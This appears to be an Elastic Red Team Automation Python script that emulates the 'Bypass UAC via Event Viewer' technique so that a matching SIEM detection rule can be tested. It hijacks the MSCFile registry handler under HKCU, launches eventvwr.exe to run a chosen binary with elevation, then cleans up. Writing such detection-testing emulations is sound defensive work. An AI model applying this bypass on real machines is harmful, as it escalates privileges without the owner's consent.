Files
sigma-rules/rta/uac_eventviewer.py
T
2023-10-03 10:47:58 -04:00

56 lines
1.6 KiB
Python

# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
# Name: Bypass UAC via Event Viewer
# RTA: uac_eventviewer.py
# ATT&CK: T1088
# Description: Modifies the Registry value to change the handler for MSC files, bypassing UAC.
import sys
import time
from . import common
from . import RtaMetadata
metadata = RtaMetadata(
uuid="1185afa2-49aa-4cca-8702-228d238c0bd5",
platforms=["windows"],
endpoint=[],
siem=[{"rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", "rule_name": "Bypass UAC via Event Viewer"}],
techniques=["T1548"],
)
# Default machine value:
# HKLM\Software\Classes\MSCFile\shell\open\command\(Default)
# %SystemRoot%\system32\mmc.exe "%1" %*
@common.requires_os(*metadata.platforms)
def main(target_file=common.get_path("bin", "myapp.exe")):
winreg = common.get_winreg()
common.log("Bypass UAC with %s" % target_file)
common.log("Writing registry key")
hkey = winreg.CreateKey(winreg.HKEY_CURRENT_USER, "Software\\Classes\\MSCFile\\shell\\open\\command")
winreg.SetValue(hkey, "", winreg.REG_SZ, target_file)
common.log("Running event viewer")
common.execute(["c:\\windows\\system32\\eventvwr.exe"])
time.sleep(3)
common.log("Killing MMC", log_type="!")
common.execute(["taskkill", "/f", "/im", "mmc.exe"])
common.log("Restoring registry key", log_type="-")
winreg.DeleteValue(hkey, "")
winreg.DeleteKey(hkey, "")
winreg.CloseKey(hkey)
if __name__ == "__main__":
exit(main(*sys.argv[1:]))